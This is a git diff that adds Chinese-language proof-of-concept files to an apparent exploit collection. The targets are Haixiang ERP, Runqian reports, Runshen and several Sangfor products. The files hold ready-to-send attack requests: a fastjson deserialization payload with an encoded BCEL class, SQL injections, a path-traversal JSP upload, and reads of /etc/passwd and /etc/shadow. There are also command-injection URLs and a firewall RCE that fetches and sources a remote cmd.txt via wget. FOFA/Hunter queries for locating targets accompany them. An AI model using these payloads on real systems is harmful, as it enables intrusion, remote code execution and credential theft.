+
+```javascript
+POST /bic/ssoService/v1/applyST HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+Content-Type: application/json
+cmd: whoami
+
+{"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"}}
+```
+
+![image-20241211211226921](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112112999.png)
\ No newline at end of file
diff --git a/海翔ERP-SQL注入漏洞.md b/海翔ERP-SQL注入漏洞.md
new file mode 100644
index 0000000..3a1c6db
--- /dev/null
+++ b/海翔ERP-SQL注入漏洞.md
@@ -0,0 +1,18 @@
+## 海翔ERP SQL注入漏洞
+
+海翔ERP存在SQL注入漏洞，由于系统未对用户输入的内容进行过滤，攻击者可以通过/getylist_login.do路由进行SQL注入，从而获取数据库中的敏感信息。
+
+
+## poc
+```
+POST /getylist_login.do HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Length: 77
+Accept-Encoding: gzip
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+accountname=test' and (updatexml(1,concat(0x7e,(select md5(123)),0x7e),1));--
+```
+
diff --git a/润乾报表InputServlet存在任意文件上传漏洞.md b/润乾报表InputServlet存在任意文件上传漏洞.md
new file mode 100644
index 0000000..1a1bfe0
--- /dev/null
+++ b/润乾报表InputServlet存在任意文件上传漏洞.md
@@ -0,0 +1,50 @@
+# 润乾报表InputServlet存在任意文件上传漏洞
+
+# 一、漏洞简介
+润乾报表是一个纯JAVA的企业级报表工具支持对J2EE系统的嵌入式部署，无缝集成。服务器端支持各种常见的操作系统，提供高效的报表设计方案、强大的报表展现能力、灵活的部署机制，支持强关联语义模型，并且具备强有力的填报功能和olap分析，为企业级数据分析与商业智能提供了高性能、高效率的报表系统解决方案。润乾报表InputServlet存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 润乾报表
+
+# 三、资产测绘
++ hunter`app.name="润乾报表平台"`
++ 特征
+
+![1712713418597-1304fe4b-6423-40c5-b6c4-622581d06799.png](./img/nF5vX5OkCsHgPsZX/1712713418597-1304fe4b-6423-40c5-b6c4-622581d06799-019490.png)
+
+# 四、漏洞复现
+```java
+POST /InputServlet?action=12 HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 241
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="upsize"
+
+1024
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="/\..\\..\\..\2211.jsp"
+Content-Type: image/jpeg
+
+123
+--00content0boundary00--
+```
+
+![1712713445103-ad84172d-20aa-42b8-83ce-f74c1e305e7c.png](./img/nF5vX5OkCsHgPsZX/1712713445103-ad84172d-20aa-42b8-83ce-f74c1e305e7c-519159.png)
+
+文件上传位置
+
+```java
+/2211.jsp
+```
+
+![1712713472577-df0cff32-9c0d-4008-ac1a-d3b6be3fbe2d.png](./img/nF5vX5OkCsHgPsZX/1712713472577-df0cff32-9c0d-4008-ac1a-d3b6be3fbe2d-185970.png)
+
+
+
+> 更新: 2024-04-16 14:37:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ekg0bvs3ogtplydg>
\ No newline at end of file
diff --git a/润乾报表InputServlet存在任意文件读取漏洞.md b/润乾报表InputServlet存在任意文件读取漏洞.md
new file mode 100644
index 0000000..c62f626
--- /dev/null
+++ b/润乾报表InputServlet存在任意文件读取漏洞.md
@@ -0,0 +1,31 @@
+# 润乾报表InputServlet存在任意文件读取漏洞
+
+# 一、漏洞简介
+润乾报表是一个纯JAVA的企业级报表工具支持对J2EE系统的嵌入式部署，无缝集成。服务器端支持各种常见的操作系统，提供高效的报表设计方案、强大的报表展现能力、灵活的部署机制，支持强关联语义模型，并且具备强有力的填报功能和olap分析，为企业级数据分析与商业智能提供了高性能、高效率的报表系统解决方案。润乾报表InputServlet存在任意文件读取漏洞，未经身份攻击者可通过该漏洞读取系统内部配置文件及敏感数据凭证，使系统处于极不安全状态。
+
+# 二、影响版本
++ 润乾报表
+
+# 三、资产测绘
++ hunter`app.name="润乾报表平台"`
++ 特征
+
+![1712713418597-1304fe4b-6423-40c5-b6c4-622581d06799.png](./img/3t8T2Ov2W0KH4EFf/1712713418597-1304fe4b-6423-40c5-b6c4-622581d06799-025732.png)
+
+# 四、漏洞复现
+```java
+POST /InputServlet?action=13 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config
+```
+
+![1713167588772-85cd2ff7-f7f1-417c-a916-bb61f767a6e9.png](./img/3t8T2Ov2W0KH4EFf/1713167588772-85cd2ff7-f7f1-417c-a916-bb61f767a6e9-908853.png)
+
+
+
+> 更新: 2024-04-16 14:37:57  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/myq4mz6ygioo0z8s>
\ No newline at end of file
diff --git a/润申企业标准化管理系统DefaultHandler存在SQL注入漏洞.md b/润申企业标准化管理系统DefaultHandler存在SQL注入漏洞.md
new file mode 100644
index 0000000..d631c92
--- /dev/null
+++ b/润申企业标准化管理系统DefaultHandler存在SQL注入漏洞.md
@@ -0,0 +1,55 @@
+# 润申企业标准化管理系统DefaultHandler存在SQL注入漏洞
+
+# 一、漏洞简介
+润申企业标准化管理系统DefaultHandler存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 润申企业标准化管理系统
+
+# 三、资产测绘
++ hunter`web.body="PDCA/js/_publicCom.js"`
++ 特征
+
+![1706683539418-696ecda0-4ff3-464b-b2e3-babb1ff1535c.png](./img/vxgv315vbLxerLKK/1706683539418-696ecda0-4ff3-464b-b2e3-babb1ff1535c-588200.png)
+
+# 四、漏洞复现
+```plain
+POST /ashx/DefaultHandler.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
+
+action=GetDetail&status=300&id=1+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2885%29%2BCHAR%28122%29%2BCHAR%2883%29%2BCHAR%28113%29%2BCHAR%2890%29%2BCHAR%28120%29%2BCHAR%2888%29%2BCHAR%28103%29%2BCHAR%2886%29%2BCHAR%28122%29%2BCHAR%2876%29%2BCHAR%2881%29%2BCHAR%2868%29%2BCHAR%2871%29%2BCHAR%2866%29%2BCHAR%28104%29%2BCHAR%2872%29%2BCHAR%28117%29%2BCHAR%2890%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28105%29%2BCHAR%2865%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28118%29%2BCHAR%28119%29%2BCHAR%28119%29%2BCHAR%28119%29%2BCHAR%28111%29%2BCHAR%2877%29%2BCHAR%2890%29%2BCHAR%28105%29%2BCHAR%28103%29%2BCHAR%28111%29%2BCHAR%2880%29%2BCHAR%28106%29%2BCHAR%2869%29%2BCHAR%2887%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+BUHl
+```
+
+![1706683626241-47cd4bf6-62a1-4c76-9ea8-17ea7a0f0ca8.png](./img/vxgv315vbLxerLKK/1706683626241-47cd4bf6-62a1-4c76-9ea8-17ea7a0f0ca8-238255.png)
+
+sqlmap
+
+```plain
+POST /ashx/DefaultHandler.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
+
+action=GetDetail&status=300&id=1
+```
+
+![1706683667235-7e291c4d-59f6-43a2-b4be-f55a0a06a191.png](./img/vxgv315vbLxerLKK/1706683667235-7e291c4d-59f6-43a2-b4be-f55a0a06a191-376936.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/re7d3yel51oishkq>
\ No newline at end of file
diff --git a/深信服EDR平台存在任意用户登录漏洞.md b/深信服EDR平台存在任意用户登录漏洞.md
new file mode 100644
index 0000000..d355a7d
--- /dev/null
+++ b/深信服EDR平台存在任意用户登录漏洞.md
@@ -0,0 +1,24 @@
+# 深信服EDR平台存在任意用户登录漏洞
+
+# 一、漏洞简介
+ 深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。该EDR系统存在任意用户登录漏洞，攻击者通过漏洞可以登录系统后台并获取服务器的敏感信息。
+
+# 二、影响版本
++ 深信服EDR
+
+# 三、资产测绘
++ fofa`<font style="color:rgba(0, 0, 0, 0.9);">app="SANGFOR-EDR"</font>``<font style="color:rgba(0, 0, 0, 0.9);">title="终端检测响应平台"</font>`
+
+![1716179568863-6a3ef6e1-44be-4250-a0b9-6e869186adc6.png](./img/sKnLfiYkMwtg-rAE/1716179568863-6a3ef6e1-44be-4250-a0b9-6e869186adc6-627743.png)
+
+# 四、漏洞复现
+```plain
+/ui/login.php?user=admin
+```
+
+![1716179600545-25ccad33-6f0c-4979-85ee-1e4a54c2d137.png](./img/sKnLfiYkMwtg-rAE/1716179600545-25ccad33-6f0c-4979-85ee-1e4a54c2d137-926641.png)
+
+
+
+> 更新: 2024-05-23 13:32:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iz3fn97qincapxmq>
\ No newline at end of file
diff --git a/深信服EDR平台存在远程命令执行漏洞.md b/深信服EDR平台存在远程命令执行漏洞.md
new file mode 100644
index 0000000..c488b8f
--- /dev/null
+++ b/深信服EDR平台存在远程命令执行漏洞.md
@@ -0,0 +1,24 @@
+# 深信服EDR平台存在远程命令执行漏洞
+
+# 一、漏洞简介
+ 深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。深信服终端监测响应平台（EDR）存在远程命令执行漏洞。
+
+# 二、影响版本
++ 深信服EDR
+
+# 三、资产测绘
++ fofa`<font style="color:rgba(0, 0, 0, 0.9);">app="SANGFOR-EDR"</font>``<font style="color:rgba(0, 0, 0, 0.9);">title="终端检测响应平台"</font>`
+
+![1716179568863-6a3ef6e1-44be-4250-a0b9-6e869186adc6.png](./img/SSNDnO_IRu30np4k/1716179568863-6a3ef6e1-44be-4250-a0b9-6e869186adc6-578437.png)
+
+# 四、漏洞复现
+```plain
+/tool/log/c.php?strip_slashes=system&host=id
+```
+
+![1716179905089-bcaa2ab3-5127-42cb-8f89-09f79a843007.png](./img/SSNDnO_IRu30np4k/1716179905089-bcaa2ab3-5127-42cb-8f89-09f79a843007-377633.png)
+
+
+
+> 更新: 2024-05-23 13:32:28  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bw1hyzgtaebgmp4x>
\ No newline at end of file
diff --git a/深信服SANGFOR终端检测响应平台---任意用户免密登录,前台RCE.md b/深信服SANGFOR终端检测响应平台---任意用户免密登录,前台RCE.md
new file mode 100644
index 0000000..5620fe8
--- /dev/null
+++ b/深信服SANGFOR终端检测响应平台---任意用户免密登录,前台RCE.md
@@ -0,0 +1,29 @@
+## SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE
+
+## FOFA语法
+```
+title="SANGFOR终端检测响应平台"
+icon_hash="1307354852"
+```
+##  鹰图搜索
+```
+web.title="SANGFOR终端检测响应平台"
+web.icon=="68e28d49856759ddeb91b6be3d6f7e42"
+```
+
+## 漏洞复现
+路由后拼接/ui/login.php?user={{需要登录的用户名}}
+
+这边以admin权限用户为例
+```
+GET /ui/login.php?user=admin HTTP/1.1
+
+Host: {{Hostname}}
+```
+
+## 前台RCE
+```
+GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1
+
+Host: {{Hostname}}
+```
diff --git a/深信服SG上网优化管理系统-catjs.php-任意文件读取漏洞.md b/深信服SG上网优化管理系统-catjs.php-任意文件读取漏洞.md
new file mode 100644
index 0000000..9aceade
--- /dev/null
+++ b/深信服SG上网优化管理系统-catjs.php-任意文件读取漏洞.md
@@ -0,0 +1,6 @@
+## 深信服SG上网优化管理系统 catjs.php 任意文件读取漏洞
+```
+POST /php/catjs.php
+
+[" ../../../../../../etc/shadow"]
+```
diff --git a/深信服SG上网优化管理系统catjs存在任意文件读取漏洞.md b/深信服SG上网优化管理系统catjs存在任意文件读取漏洞.md
new file mode 100644
index 0000000..761fa18
--- /dev/null
+++ b/深信服SG上网优化管理系统catjs存在任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 深信服SG上网优化管理系统catjs存在任意文件读取漏洞
+
+# 一、漏洞简介
+SANGFOR上网优化管理系统是一款集上网行为管理、网络准入、设备准入以及业务访问行为分析于一体的安全产品。核心优势：多种认证方式、全面的审计能力、支持多种应用的封堵、*的流量控制；准确识别iot设备、统一管理硬件资产；强管控违规用户，精细分析行为画像；部署实施简单，维护成本低。全网行为管理基于端点无感知、少故障节点、不影响原有网络为原则的产品设计理念，致力于给客户带来更好的使用体验。深信服SG上网优化管理系统catjs存在任意文件读取漏洞
+
+# 二、影响版本
++ 深信服SG上网优化管理系统
+
+# 三、资产测绘
++ fofa`title="SANGFOR上网优化管理"`
++ 特征
+
+![1713460250581-3ce6b4ad-84c1-4a1c-83c2-a67e0d664c38.png](./img/tVIicowd7O9vW7DB/1713460250581-3ce6b4ad-84c1-4a1c-83c2-a67e0d664c38-221870.png)
+
+# 四、漏洞复现
+```plain
+POST /php/catjs.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 35
+
+["../../../../../../../etc/passwd"]
+```
+
+![1713460280458-dae40fc1-b98b-4c65-b626-c1732fdac8fa.png](./img/tVIicowd7O9vW7DB/1713460280458-dae40fc1-b98b-4c65-b626-c1732fdac8fa-365869.png)
+
+
+
+> 更新: 2024-04-19 08:49:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zn0vntfcl2txn765>
\ No newline at end of file
diff --git a/深信服下一代防火墙NGAF-RCE漏洞.md b/深信服下一代防火墙NGAF-RCE漏洞.md
new file mode 100644
index 0000000..8e2f489
--- /dev/null
+++ b/深信服下一代防火墙NGAF-RCE漏洞.md
@@ -0,0 +1,21 @@
+
+## 深信服下一代防火墙NGAF RCE漏洞
+
+## POC
+```
+POST /LogInOut.php HTTP/1.1
+Host:
+Cookie: PHPSESSID=2e01d2ji93utnsb5abrcm780c2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Connection: close
+Content-Length: 625
+
+type=logged&un=watchTowr;wget http://<host>/cmd.txt;source /virus/dcweb/webapps/cmd.txt&up=0f2df0a6f151e836c8ccd1c2ea3bfbdfb7bfa0d38d438942492bd8f28f3e92939319f932f2f2add6d0d484accdc4c28269b203c4dc77c1da941fa19dae017d44d6ea8cad2572e37c485a8ebcb4bdb510cc86420a50ae45ae07daf5fe9c40fe133f3806cd8f3158ee359766e8e19c9fbbf7e888bf0d7f3952f4d083bd17cd19eb960dadec2835f6f259616f5b2e5942d3a4d1754cbd69696fae60ef18358bf5782dd5ebf377f5642e0583e630660ccac241a615ae21bfc12852a32d0367a899eb010e5d1c33669fc2e9ea3a0ecbf078c22120196a115b4038288063bf99610d3d331acb53e5c8fbd14229a4abdff83cf075a7b97a9bb9dae3586f19256f4262d5&vericode=<correct captcha>
+```
+
+Cmd.txt 有效载荷：
+```
+sed -i s/Lock/"$(id)"/g /virus/dcweb/conf/lang/eng.utf8.lang.app.php
+```
+
+![](https://labs.watchtowr.com/content/images/2023/10/image-13.png)
diff --git a/深信服下一代防火墙NGAFloadfile存在任意文件读取漏洞.md b/深信服下一代防火墙NGAFloadfile存在任意文件读取漏洞.md
new file mode 100644
index 0000000..bb2018c
--- /dev/null
+++ b/深信服下一代防火墙NGAFloadfile存在任意文件读取漏洞.md
@@ -0,0 +1,29 @@
+# 深信服下一代防火墙NGAF loadfile存在任意文件读取漏洞
+
+# 一、漏洞简介
+深信服下一代防火墙NGAF专注网络边界安全效果，通过应用丰富的安全创新防御技术和简单易用的产品设计理念，不仅增强网络边界的安全检测与防控能力，而且实现网络安全风险可视化展示与快速处置，让组织网络边界安全建设更有效、更简单。该系统存在任意文件读取漏洞，会造成敏感信息泄露。
+
+# 二、影响版本
++ 深信服下一代防火墙NGAF
+
+# 三、资产测绘
++ fofa`title="SANGFOR | NGAF"`
++ 特征
+
+![1713458847916-2fa4ae06-c1c9-46aa-a7d9-4a41a36c3b74.png](./img/kJMEluyAHaF5_DOx/1713458847916-2fa4ae06-c1c9-46aa-a7d9-4a41a36c3b74-683282.png)
+
+# 四、漏洞复现
+```plain
+GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
+Host: 
+Accept: */*
+Content-Type: application/x-www-form-urlencoded
+y-forwarded-for: 127.0.0.1
+```
+
+![1713458879412-36bd7456-0731-4750-96b3-4ea1f5663bbb.png](./img/kJMEluyAHaF5_DOx/1713458879412-36bd7456-0731-4750-96b3-4ea1f5663bbb-103266.png)
+
+
+
+> 更新: 2024-04-19 08:49:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xem61o3tiw39r3cr>
\ No newline at end of file
diff --git a/深信服应用交付管理系统download存在任意文件读取漏洞.md b/深信服应用交付管理系统download存在任意文件读取漏洞.md
new file mode 100644
index 0000000..aa1d9a3
--- /dev/null
+++ b/深信服应用交付管理系统download存在任意文件读取漏洞.md
@@ -0,0 +1,34 @@
+# 深信服应用交付管理系统download存在任意文件读取漏洞
+
+# 一、漏洞简介
+SINFOR AD是深信服最新推出的应用交付系列设备，其突出特色就是SINFOR AD的智能分析功能。深信服应用交付报表系统存在任意文件读取漏洞,攻击者利用漏洞可读取设备中的指定路径文件。
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 深信服应用交付管理系统
+
+# 三、资产测绘
++ hunter`app.name="SANGFOR 深信服应用交付报表系统"`
+
+![1692580728281-e2c427e5-64ba-4fda-80b8-5dcd4479adb2.png](./img/inddIlyPIEVWA20l/1692580728281-e2c427e5-64ba-4fda-80b8-5dcd4479adb2-600823.png)
+
++ 登录页面
+
+![1692580869733-49d82074-5a7c-4a29-9672-2f3b2f4b1557.png](./img/inddIlyPIEVWA20l/1692580869733-49d82074-5a7c-4a29-9672-2f3b2f4b1557-195155.png)
+
+# 四、漏洞复现
+```plain
+GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![1713459981265-735fdb41-5657-4fbd-b2cf-4cec25a0eb5c.png](./img/inddIlyPIEVWA20l/1713459981265-735fdb41-5657-4fbd-b2cf-4cec25a0eb5c-129484.png)
+
+
+
+> 更新: 2024-04-19 08:49:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zuh5abx5zhqimn9n>
\ No newline at end of file
diff --git a/深信服应用交付管理系统rep_login远程命令执行漏洞.md b/深信服应用交付管理系统rep_login远程命令执行漏洞.md
new file mode 100644
index 0000000..86c3b17
--- /dev/null
+++ b/深信服应用交付管理系统rep_login远程命令执行漏洞.md
@@ -0,0 +1,36 @@
+# 深信服应用交付管理系统rep/login远程命令执行漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">深信服应用交付管理系统login存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，执行任意命令。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 深信服应用交付管理系统7.0.8-7.0.8R5
+
+# 三、资产测绘
++ hunter`app.name="SANGFOR 深信服应用交付报表系统"`
+
+![1692580728281-e2c427e5-64ba-4fda-80b8-5dcd4479adb2.png](./img/YVbx9nDj2BQqWKBd/1692580728281-e2c427e5-64ba-4fda-80b8-5dcd4479adb2-975958.png)
+
++ 登录页面
+
+![1692580869733-49d82074-5a7c-4a29-9672-2f3b2f4b1557.png](./img/YVbx9nDj2BQqWKBd/1692580869733-49d82074-5a7c-4a29-9672-2f3b2f4b1557-185987.png)
+
+# 四、漏洞复现
+```plain
+POST /rep/login HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-type: application/x-www-form-urlencoded
+Content-Length: 118
+
+clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
+```
+
+![1692581114528-027f3515-1f23-446c-8ae9-9200fcd494e7.png](./img/YVbx9nDj2BQqWKBd/1692581114528-027f3515-1f23-446c-8ae9-9200fcd494e7-240197.png)
+
+
+
+> 更新: 2024-04-19 08:49:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nfnaaq9o1k6tgszw>
\ No newline at end of file
diff --git a/深信服数据中心管理系统-XML-实体注入漏洞.md b/深信服数据中心管理系统-XML-实体注入漏洞.md
new file mode 100644
index 0000000..e7aba4f
--- /dev/null
+++ b/深信服数据中心管理系统-XML-实体注入漏洞.md
@@ -0,0 +1,21 @@
+## 深信服数据中心管理系统 XML 实体注入漏洞
+```
+GET /src/sangforindex HTTP/1.1
+Host: ip:port
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)
+Accept:
+text/xml,application/xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Content-Type: text/xml
+Accept-Encoding: gzip, deflate, br
